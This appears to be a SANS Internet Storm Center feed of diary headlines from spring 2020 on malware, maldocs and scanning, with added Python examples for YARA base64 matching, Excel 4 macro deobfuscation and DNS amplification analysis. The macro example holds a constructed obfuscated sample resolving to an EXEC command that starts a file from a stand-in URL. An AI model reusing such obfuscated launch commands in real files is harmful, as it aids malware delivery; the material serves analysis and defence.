Excel 4 Macro Analysis: XLMMacroDeobfuscator, (Mon, May 11th)
Malicious Excel 4 macro documents are becoming more prevalent. They are now so heavily obfuscated that analysis requires evaluating many formulas, not just dumping strings.…
Tag: SANS Internet Storm Center, InfoCON: green
ISC Stormcast For Monday, May 11th 2020 https://isc.sans.edu/podcastdetail.html?id=6990, (Mon, May 11th)
YARA v4.0.0: BASE64 Strings, (Sun, May 10th)
YARA version 4.0.0 has been released; among its new features is the `base64` string modifier.…
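What the new `base64` string modifier has to match, as an added example that is not from the diary or the YARA project: a string embedded in base64 text encodes differently depending on its byte offset modulo 3, so a detection needs three fragments, each trimmed of the characters whose bits also depend on neighbouring bytes. The function names and the constructed sample buffers are mine; "This program cannot" is the string YARA's own documentation uses for this feature.

```python
import base64
import math


def base64_fragments(plain: bytes):
    """Return the three base64 substrings that `plain` can produce depending on
    its byte offset (mod 3) inside a larger base64-encoded buffer. Characters
    whose six bits also depend on unknown neighbouring bytes are dropped at
    both ends. This mirrors what YARA 4.0's `base64` modifier searches for;
    it is an added illustration, not YARA's code."""
    fragments = []
    for shift in range(3):
        # Prefix `shift` placeholder bytes so `plain` starts at each alignment.
        encoded = base64.b64encode(b"\x00" * shift + plain).decode("ascii")
        first_bit, last_bit = 8 * shift, 8 * (shift + len(plain))
        start = math.ceil(first_bit / 6)   # first char lying fully inside plain
        end = last_bit // 6                # one past the last such char
        fragments.append(encoded[start:end])
    return fragments


def base64_contains(blob: str, plain: bytes) -> bool:
    """True if `plain` appears, at any alignment, inside base64 text `blob`."""
    return any(frag in blob for frag in base64_fragments(plain))


if __name__ == "__main__":
    for frag in base64_fragments(b"This program cannot"):
        print(frag)
```

`base64_fragments(b"This program cannot")` yields `VGhpcyBwcm9ncmFtIGNhbm5vd`, `RoaXMgcHJvZ3JhbSBjYW5ub3` and `UaGlzIHByb2dyYW0gY2Fubm90`, the same three patterns a rule such as `$a = "This program cannot" base64` now expands to, which analysts previously generated and maintained by hand. The trimming is what makes the fragments safe to search for regardless of what precedes or follows the string in the encoded buffer.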
Nmap Basics – The Security Practitioner’s Swiss Army Knife, (Sat, May 9th)
To elaborate on Xavier's and Bojan's excellent nmap diaries over the last few days, I thought that today might be a good day to…
VMWare vRealize Critical vulnerabilities due to SaltStack – VMSA-2020-0009, (Sat, May 9th)
VMware has announced two vulnerabilities in their vRealize product related to their integration of the popular open source server management software SaltStack, for which…
Using Nmap As a Lightweight Vulnerability Scanner, (Fri, May 8th)
Yesterday, Bojan wrote a nice diary[1] about the power of the Nmap scripting language (based on Lua). The well-known port scanner can be extended with plenty…
ISC Stormcast For Friday, May 8th 2020 https://isc.sans.edu/podcastdetail.html?id=6988, (Fri, May 8th)
Scanning with nmap's NSE scripts, (Thu, May 7th)
If someone asked me 7 or 8 years ago what I use nmap for, my answer would be: simple port scanning. It's a port scanner, and that's…
ISC Stormcast For Thursday, May 7th 2020 https://isc.sans.edu/podcastdetail.html?id=6986, (Thu, May 7th)
Keeping an Eye on Malicious Files Life Time, (Wed, May 6th)
We know that today's malware campaigns are based on fresh files. Each piece of malware has a unique hash, and that makes detection based…
ISC Stormcast For Wednesday, May 6th 2020 https://isc.sans.edu/podcastdetail.html?id=6984, (Wed, May 6th)
ISC Stormcast For Tuesday, May 5th 2020 https://isc.sans.edu/podcastdetail.html?id=6982, (Tue, May 5th)
Cloud Security Features Don’t Replace the Need for Personnel Security Capabilities, (Tue, May 5th)
We received excellent comments and a question regarding cloud security features from an ISC reader today that we thought was important to…
Sysmon and File Deletion, (Mon, May 4th)
A new version of Sysmon was released, with a new major feature: detection of file deletion (with deleted file preservation).…
ISC Stormcast For Monday, May 4th 2020 https://isc.sans.edu/podcastdetail.html?id=6980, (Mon, May 4th)
ZIP & AES, (Sun, May 3rd)
A comment on my diary entry “MALWARE Bazaar” mentioned problems with the ZIP password of downloaded samples (MALWARE Bazaar is a free service where you can download malware samples). …
Phishing PDF with Unusual Hostname, (Sat, May 2nd)
Taking a look with pdfid.py at a PDF received 2 days ago to update Amazon Prime account information: …
ISC Stormcast For Friday, May 1st 2020 https://isc.sans.edu/podcastdetail.html?id=6978, (Fri, May 1st)
Attack traffic on TCP port 9673, (Fri, May 1st)
I don't know how many of you pay attention to the Top 10 Ports graphs on your isc.sans.edu dashboard, but I do. Unfortunately, the top 10 is…
Collecting IOCs from IMAP Folder, (Thu, Apr 30th)
I have plenty of subscriptions to “cyber security” mailing lists that generate a lot of traffic. Even if we try to get rid of emails, that's a fact: email…
ISC Stormcast For Thursday, April 30th 2020 https://isc.sans.edu/podcastdetail.html?id=6976, (Thu, Apr 30th)
Privacy Preserving Protocols to Trace Covid19 Exposure, (Wed, Apr 29th)
In recent weeks, you probably heard a lot about the “Covid19 Tracing Apps” that Google, Apple, and others are working on. These news reports usually mention the privacy aspects…
ISC Stormcast For Wednesday, April 29th 2020 https://isc.sans.edu/podcastdetail.html?id=6974, (Wed, Apr 29th)
Agent Tesla delivered by the same phishing campaign for over a year, (Tue, Apr 28th)
While going over malicious e-mails caught by our company gateway in March, I noticed that several of those that carried ACE…
ISC Stormcast For Tuesday, April 28th 2020 https://isc.sans.edu/podcastdetail.html?id=6972, (Tue, Apr 28th)
Powershell Payload Stored in a PSCredential Object, (Mon, Apr 27th)
An interesting obfuscation technique to store a malicious payload in a PowerShell script: in a PSCredential object!…
ISC Stormcast For Monday, April 27th 2020 https://isc.sans.edu/podcastdetail.html?id=6970, (Mon, Apr 27th)
Video: Malformed .docm File, (Sun, Apr 26th)
In diary entry “Obfuscated with a Simple 0x0A”, Xavier discovers that a .docm file is a malformed ZIP file.…
MALWARE Bazaar, (Sat, Apr 25th)
When we publish diary entries covering malware, we almost always share the hash of the malware sample.…
ISC Stormcast For Friday, April 24th 2020 https://isc.sans.edu/podcastdetail.html?id=6968, (Fri, Apr 24th)
Malicious Excel With a Strong Obfuscation and Sandbox Evasion, (Fri, Apr 24th)
For a few weeks, we have seen a bunch of Excel documents spread in the wild with Macro V4[1]. But VBA macros remain a classic…
ISC Stormcast For Thursday, April 23rd 2020 https://isc.sans.edu/podcastdetail.html?id=6966, (Thu, Apr 23rd)
ISC Stormcast For Wednesday, April 22nd 2020 https://isc.sans.edu/podcastdetail.html?id=6964, (Wed, Apr 22nd)
ISC Stormcast For Tuesday, April 21st 2020 https://isc.sans.edu/podcastdetail.html?id=6962, (Tue, Apr 21st)
SpectX: Log Parser for DFIR, (Tue, Apr 21st)
I hope this finds you all safe, healthy, and sheltered to the best of your ability.…
KPOT AutoIt Script: Analysis, (Mon, Apr 20th)
In diary entry “KPOT Deployed via AutoIt Script” I obtained 3 files: …
ISC Stormcast For Monday, April 20th 2020 https://isc.sans.edu/podcastdetail.html?id=6960, (Mon, Apr 20th)
KPOT Analysis: Obtaining the Decrypted KPOT EXE, (Sun, Apr 19th)
In diary entry “KPOT Deployed via AutoIt Script” I obtained 3 files: …
Maldoc Falsely Represented as DOCX Invoice Redirecting to Fake Apple Store, (Sat, Apr 18th)
This is a phishing document received today pretending to be an invoice (Word Document) from Apple Support but initial analysis shows it…
Weaponized RTF Document Generator & Mailer in PowerShell, (Fri, Apr 17th)
Another piece of malicious PowerShell script that I found while hunting. Like many malicious activities that occur these days, it is related to the…
ISC Stormcast For Friday, April 17th 2020 https://isc.sans.edu/podcastdetail.html?id=6958, (Fri, Apr 17th)
Using AppLocker to Prevent Living off the Land Attacks, (Thu, Apr 16th)
STI student David Brown published an STI research paper in January with some interesting ideas to prevent living off the land attacks with AppLocker.…
ISC Stormcast For Thursday, April 16th 2020 https://isc.sans.edu/podcastdetail.html?id=6956, (Thu, Apr 16th)
No IOCs? No Problem! Getting a Start Hunting for Malicious Office Files, (Wed, Apr 15th)
ISC Stormcast For Wednesday, April 15th 2020 https://isc.sans.edu/podcastdetail.html?id=6954, (Wed, Apr 15th)
Microsoft April 2020 Patch Tuesday, (Tue, Apr 14th)
This month we got patches for 113 vulnerabilities in total. According to Microsoft, three of them are being exploited (CVE-2020-1020, CVE-2020-0938 and CVE-2020-0968) and two were previously disclosed (CVE-2020-1020 and CVE-2020-0935).…
ISC Stormcast For Tuesday, April 14th 2020 https://isc.sans.edu/podcastdetail.html?id=6952, (Tue, Apr 14th)
Look at the same phishing campaign 3 months apart, (Mon, Apr 13th)
While going through a batch of malicious e-mails, which were caught by my mail filters in March, I noticed a simple phishing e-mail, which carried an entire credential-stealing page in its attachment. This, although interesting in its own way, would…
ISC Stormcast For Monday, April 13th 2020 https://isc.sans.edu/podcastdetail.html?id=6950, (Mon, Apr 13th)
Reader Analysis: “Dynamic analysis technique to get decrypted KPOT Malware.”, (Sun, Apr 12th)
Reader Vinnie shared his analysis of KPOT malware with us: …
Wireshark 3.2.3 Released: Mac Users Pay Attention Please, (Sat, Apr 11th)
Wireshark version 3.2.3 has been released.…
Critical Vuln in vCenter vmdir (CVE-2020-3952), (Fri, Apr 10th)
On April 9, VMware published VMSA-2020-0006, a security advisory for a critical vulnerability in vCenter Server that received the maximum CVSSv3 score of 10.0. The vulnerability, CVE-2020-3952, involves a sensitive information disclosure flaw in the VMware Directory Service (vmdir)…
PowerShell Sample Extracting Payload From SSL, (Fri, Apr 10th)
Another diary, another technique to fetch a malicious payload and execute it on the victim host. I spotted this piece of PowerShell code this morning while reviewing my hunting results. It implements a very interesting technique. As usual, all the…
ISC Stormcast For Friday, April 10th 2020 https://isc.sans.edu/podcastdetail.html?id=6948, (Fri, Apr 10th)
Performing deception to OS Fingerprint (Part 1: nmap), (Sat, Mar 28th)
How can you know which operating system is running on a specific remote host? The technique that answers this question is operating system fingerprinting, and it works by sending a specific set of packets to the…
ISC Stormcast For Thursday, April 9th 2020 https://isc.sans.edu/podcastdetail.html?id=6946, (Thu, Apr 9th)
ISC Stormcast For Wednesday, April 8th 2020 https://isc.sans.edu/podcastdetail.html?id=6944, (Wed, Apr 8th)
German malspam pushes ZLoader malware, (Wed, Apr 8th)
Increase in RDP Scanning, (Tue, Apr 7th)
ISC Stormcast For Tuesday, April 7th 2020 https://isc.sans.edu/podcastdetail.html?id=6942, (Tue, Apr 7th)
Password Protected Malicious Excel Files, (Mon, Apr 6th)
We've been seeing quite a few malicious Excel files with Excel 4 macros lately.…
ISC Stormcast For Monday, April 6th 2020 https://isc.sans.edu/podcastdetail.html?id=6940, (Mon, Apr 6th)
Maldoc XLS Invoice with Excel 4 Macros, (Sun, Apr 5th)
This week I got an email claiming to be a YellowPages invoice with an XLS attachment containing an Excel 4.0 macro which is similar to [1][2].…
New Bypass Technique or Corrupt Word Document?, (Sat, Apr 4th)
I was taking a closer look at the Word document Xavier analyzed in yesterday's diary entry: “Obfuscated with a Simple 0x0A”.…
Obfuscated with a Simple 0x0A, (Fri, Apr 3rd)
With the current Coronavirus pandemic, we continue to see more and more malicious activity around this topic. Today, we got a report from a reader who found a nice malicious Word document that is part of a Coronavirus phishing campaign. I don't know…
ISC Stormcast For Friday, April 3rd 2020 https://isc.sans.edu/podcastdetail.html?id=6938, (Fri, Apr 3rd)
ISC Stormcast For Thursday, April 2nd 2020 https://isc.sans.edu/podcastdetail.html?id=6936, (Thu, Apr 2nd)
TPOT’s Cowrie to ISC Logs, (Thu, Apr 2nd)
ISC Stormcast For Wednesday, April 1st 2020 https://isc.sans.edu/podcastdetail.html?id=6934, (Wed, Apr 1st)
Qakbot malspam sent from an infected Windows host, (Wed, Apr 1st)
ISC Stormcast For Tuesday, March 31st 2020 https://isc.sans.edu/podcastdetail.html?id=6932, (Tue, Mar 31st)
Kwampirs Targeted Attacks Involving Healthcare Sector, (Tue, Mar 31st)
There is no honor among thieves. Even after some ransomware gangs claimed to cease targeting the healthcare sector, attacks continue to happen. But ransomware isn't alone. Last week, the FBI updated an advisory regarding the Kwampirs malware, pointing out the…
Crashing explorer.exe with(out) a click, (Mon, Mar 30th)
In a couple of my recent diaries, we discussed two small unpatched vulnerabilities/weaknesses in Windows. One, which allowed us to brute-force contents of folders without any permissions[1], and another, which enabled us to change names of files and folders without…
Obfuscated Excel 4 Macros, (Sun, Mar 29th)
Two readers (anonymous and Robert) submitted very similar malicious spreadsheets with almost no detections on VT: c1394e8743f0d8e59a4c7123e6cd5298 and a03ae50077bf6fad3b562241444481c1.…
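Why these obfuscated Excel 4 samples, like the ones in the XLMMacroDeobfuscator entry at the top of this page, need a formula evaluator rather than a string dump, as an added example that is neither the diary's code nor XLMMacroDeobfuscator: a minimal Excel 4 formula interpreter run over a constructed sheet. The sheet, the cell names and the example.test URL are invented for illustration; the evaluator handles `&`, `+`/`-`, `CHAR()`, `MID()` and A1-style cell references, and deliberately leaves `EXEC()` and similar calls unexecuted with their arguments resolved, which is the indicator an analyst is after.

```python
import re

# Constructed sample sheet (not from a real maldoc): the URL is hidden behind
# CHAR() arithmetic, a cell reference and a MID() slice; only the resolved
# EXEC() argument shows what the macro would run.
SAMPLE_SHEET = {
    "A1": '=CHAR(100+4)&CHAR(58+58)&CHAR(116)&CHAR(B1)',
    "B1": 112,
    "A2": '=A1&":"&"//"&MID("zzexample.test/p.exe",3,18)',
    "A3": '=EXEC("cmd /c start "&A2)',
}

# string literal | number | function or cell name | operator | anything else
_TOKEN = re.compile(r'("(?:[^"]|"")*")|(\d+)|([A-Z][A-Z0-9]*)|([&(),+\-])|(\S)')

def tokenize(formula):
    """Turn a formula body (without the leading '=') into (kind, value) tokens."""
    tokens = []
    for text, num, name, op, bad in _TOKEN.findall(formula):
        if bad:
            raise ValueError(f"unsupported syntax {bad!r} in {formula!r}")
        if text:
            tokens.append(("str", text[1:-1].replace('""', '"')))
        else:
            tokens.append(("num", int(num)) if num else ("name", name) if name else ("op", op))
    return tokens

class _Parser:
    """Recursive descent over one formula: '&' binds loosest, then '+'/'-'."""
    def __init__(self, tokens, sheet):
        self.t, self.i, self.sheet = tokens, 0, sheet
    def peek(self):
        return self.t[self.i] if self.i < len(self.t) else (None, None)
    def take(self, expected=None):
        tok = self.peek()
        if tok[0] is None or (expected is not None and tok != expected):
            raise ValueError(f"unexpected token {tok}, wanted {expected}")
        self.i += 1
        return tok
    def expr(self):                       # concatenation level
        left = self.sum()
        while self.peek() == ("op", "&"):
            self.take()
            left = str(left) + str(self.sum())
        return left
    def sum(self):                        # arithmetic level
        left = self.atom()
        while self.peek() in (("op", "+"), ("op", "-")):
            op, right = self.take()[1], self.atom()
            left = left + right if op == "+" else left - right
        return left
    def atom(self):
        kind, val = self.take()
        if kind in ("str", "num"):
            return val
        if kind == "name" and self.peek() == ("op", "("):
            return self.call(val, self.args())
        if kind == "name":                # bare name: A1-style cell reference
            return self.sheet.cell(val)
        raise ValueError(f"cannot evaluate {kind} {val!r}")
    def args(self):
        self.take(("op", "("))
        out = [] if self.peek() == ("op", ")") else [self.expr()]
        while self.peek() == ("op", ","):
            self.take()
            out.append(self.expr())
        self.take(("op", ")"))
        return out
    def call(self, name, args):
        if name == "CHAR":
            return chr(int(args[0]))
        if name == "MID":                 # Excel MID is 1-based
            text, start, count = str(args[0]), int(args[1]), int(args[2])
            return text[start - 1:start - 1 + count]
        # EXEC, CALL, FORMULA, REGISTER, ... are deliberately not emulated:
        # return the call with its arguments resolved, which is the IOC.
        shown = ", ".join(f'"{a}"' if isinstance(a, str) else str(a) for a in args)
        return f"{name}({shown})"

class XlmSheet:
    """Evaluates cells on demand, memoised, with a circular-reference guard."""
    def __init__(self, cells):
        self.cells, self.cache, self.active = cells, {}, set()
    def cell(self, ref):
        if ref in self.cache:
            return self.cache[ref]
        if ref in self.active:
            raise ValueError(f"circular reference through {ref}")
        raw = self.cells.get(ref, "")
        value = raw
        if isinstance(raw, str) and raw.startswith("="):
            self.active.add(ref)
            value = _Parser(tokenize(raw[1:]), self).expr()
            self.active.discard(ref)
        self.cache[ref] = value
        return value
    def deobfuscate(self):
        return {ref: self.cell(ref) for ref in self.cells}
```

`XlmSheet(SAMPLE_SHEET).deobfuscate()` resolves A3 to `EXEC("cmd /c start http://example.test/p.exe")`, a value that never appears as a literal anywhere in the sheet. Real samples add hundreds of such cells, cell-to-cell jumps and `FORMULA()` calls that write new formulas at run time, which is exactly why tools like XLMMacroDeobfuscator emulate the macro instead of pattern-matching it; the circular-reference guard is there because self-referencing cells are a cheap way for a sample to hang a naive evaluator.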
Covid19 Domain Classifier, (Sat, Mar 28th)
Johannes started a Covid19 Domain Classifier here on our Internet Storm Center site.…
Help us classify Covid19 related domains https://isc.sans.edu/covidclassifier.html (login required), (Fri, Mar 27th)
Malicious JavaScript Dropping Payload in the Registry, (Fri, Mar 27th)
When we speak about “fileless” malware, it means that the malware does not use the standard filesystem to store temporary files or payloads. But it still needs to write data somewhere on the system for persistence or during the infection phase.…
ISC Stormcast For Friday, March 27th 2020 https://isc.sans.edu/podcastdetail.html?id=6928, (Fri, Mar 27th)
Very Large Sample as Evasion Technique?, (Thu, Mar 26th)
Security controls have a major requirement: they can't (or at least they try not to) interfere with normal operations of the protected system. It is known that antivirus products do not scan very large files (or scan just the first x…
ISC Stormcast For Thursday, March 26th 2020 https://isc.sans.edu/podcastdetail.html?id=6926, (Thu, Mar 26th)
ISC Stormcast For Wednesday, March 25th 2020 https://isc.sans.edu/podcastdetail.html?id=6924, (Wed, Mar 25th)
Recent Dridex activity, (Wed, Mar 25th)
SANS CyberCast Hallway Talk: Microsoft Windows Type 1 Font Parsing 0-Day https://www.youtube.com/watch?v=VSnVbrgnXJs, (Tue, Mar 24th)
Another Critical COVID-19 Shortage: Digital Security, (Tue, Mar 24th)
Following is a guest cross-post from John Scott-Railton, a Senior Researcher at The Citizen Lab. His work focuses on technological threats to civil society.…
ISC Stormcast For Tuesday, March 24th 2020 https://isc.sans.edu/podcastdetail.html?id=6922, (Tue, Mar 24th)
Windows Zeroday Actively Exploited: Type 1 Font Parsing Remote Code Execution Vulnerability, (Mon, Mar 23rd)
Microsoft announced limited exploitation of a zero-day remote code execution vulnerability in the Type 1 font parser.…
KPOT Deployed via AutoIt Script, (Mon, Mar 23rd)
I have other samples like the malware I covered in yesterday's diary entry.…
ISC Stormcast For Monday, March 23rd 2020 https://isc.sans.edu/podcastdetail.html?id=6920, (Mon, Mar 23rd)
More COVID-19 Themed Malware, (Sun, Mar 22nd)
Reader Andrew received a COVID-19 themed email with a malicious attachment, and submitted the complete email.…
Honeypot – Scanning and Targeting Devices & Services, (Sat, Mar 21st)
I was curious this week to see if my honeypot traffic would increase since a large portion of the world is working from home. Reviewing my honeypot logs, I decided to check what type of filename was mostly targeted (GET/POST/HEAD)…
ISC Stormcast For Friday, March 20th 2020 https://isc.sans.edu/podcastdetail.html?id=6918, (Fri, Mar 20th)
COVID-19 Themed Multistage Malware, (Thu, Mar 19th)
More and more countries are closing their borders and asking citizens to stay at home. The COVID-19 virus is everywhere and is also used in campaigns to lure more victims who are looking for information about the pandemic. I found a…
ISC Stormcast For Thursday, March 19th 2020 https://isc.sans.edu/podcastdetail.html?id=6916, (Thu, Mar 19th)
ISC Stormcast For Wednesday, March 18th 2020 https://isc.sans.edu/podcastdetail.html?id=6914, (Wed, Mar 18th)
Trickbot gtag red5 distributed as a DLL file, (Wed, Mar 18th)
A Quick Summary of Current Reflective DNS DDoS Attacks, (Tue, Mar 17th)
DNS is still a popular protocol to amplify denial of service attacks. A rather small DNS query, sent to an open recursive resolver, can be used to trigger a large response. Over the last few years, DNS servers implemented many…
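The two knobs behind that "small query, large response" arithmetic, as an added example that is not from the diary: a hand-built DNS query with and without an EDNS0 OPT record, the parser a resolver operator or IDS needs to read the question type and the advertised UDP payload size back out of a raw packet, and the resulting upper bound on the amplification factor. The wire layout follows RFC 1035 and RFC 6891; the name example.test, the transaction ID and the probe heuristic are my assumptions for illustration.

```python
import struct

QTYPE_A, QTYPE_ANY, RTYPE_OPT = 1, 255, 41

def encode_name(name):
    """Wire-format a domain name as length-prefixed labels ending in a zero byte."""
    labels = [lbl for lbl in name.rstrip(".").split(".") if lbl]
    return b"".join(bytes([len(lbl)]) + lbl.encode("ascii") for lbl in labels) + b"\x00"

def decode_name(pkt, off):
    """Read a (possibly compressed) name at offset; return (name, offset after it)."""
    labels = []
    while True:
        ln = pkt[off]
        if ln == 0:
            return ".".join(labels), off + 1
        if ln & 0xC0 == 0xC0:                           # compression pointer
            ptr = struct.unpack("!H", pkt[off:off + 2])[0] & 0x3FFF
            labels.append(decode_name(pkt, ptr)[0])
            return ".".join(labels), off + 2
        labels.append(pkt[off + 1:off + 1 + ln].decode("ascii"))
        off += 1 + ln

def build_query(name, qtype, txid=0x1234, edns_size=None):
    """Constructed client query: RD set, one question, optional EDNS0 OPT RR."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 1 if edns_size else 0)
    pkt = header + encode_name(name) + struct.pack("!HH", qtype, 1)
    if edns_size:
        # OPT pseudo-RR: root name, TYPE 41, CLASS carries the advertised UDP
        # payload size, TTL carries extended RCODE/version/flags, RDLENGTH 0.
        pkt += b"\x00" + struct.pack("!HHIH", RTYPE_OPT, edns_size, 0, 0)
    return pkt

def parse_query(pkt):
    """Pull the fields an amplification heuristic needs out of a raw DNS query."""
    _, flags, _, _, _, arcount = struct.unpack("!HHHHHH", pkt[:12])
    qname, off = decode_name(pkt, 12)                 # first question only
    qtype, _ = struct.unpack("!HH", pkt[off:off + 4])
    off += 4
    edns_size = None
    for _ in range(arcount):                          # look for the OPT RR
        name, off = decode_name(pkt, off)
        rtype, rclass, _, rdlen = struct.unpack("!HHIH", pkt[off:off + 10])
        off += 10 + rdlen
        if rtype == RTYPE_OPT and name == "":
            edns_size = rclass
    return {"qname": qname, "qtype": qtype, "rd": bool(flags & 0x0100),
            "edns_size": edns_size, "size": len(pkt)}

def max_udp_response(query):
    """Largest UDP answer the resolver may send: 512 bytes unless EDNS0 raises it."""
    return query["edns_size"] or 512

def amplification_factor(query):
    """Upper bound on bytes returned per byte sent for this query."""
    return max_udp_response(query) / query["size"]

def looks_like_amplification_probe(query):
    """Noisy on its own; pair it with a per-source query rate before acting."""
    return query["rd"] and query["qtype"] == QTYPE_ANY

if __name__ == "__main__":
    for qtype, edns in ((QTYPE_A, None), (QTYPE_ANY, None), (QTYPE_ANY, 4096)):
        q = parse_query(build_query("example.test", qtype, edns_size=edns))
        print(f"qtype={q['qtype']:3d} edns={q['edns_size']!s:>4} bytes={q['size']} "
              f"max_factor={amplification_factor(q):.1f} probe={looks_like_amplification_probe(q)}")
```

A 30-byte ANY query without EDNS0 can return at most 512 bytes over UDP, a factor of about 17; the same question with an OPT record advertising 4096 bytes is 41 bytes on the wire and can pull back up to 4096, a factor of nearly 100, which is why attackers combine ANY (or other large record sets) with a big EDNS buffer and a spoofed source. The mitigations the diary alludes to act on exactly these two inputs: minimal ANY answers, response rate limiting per source, and clamping the EDNS buffer the server honours.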
ISC Stormcast For Tuesday, March 17th 2020 https://isc.sans.edu/podcastdetail.html?id=6912, (Tue, Mar 17th)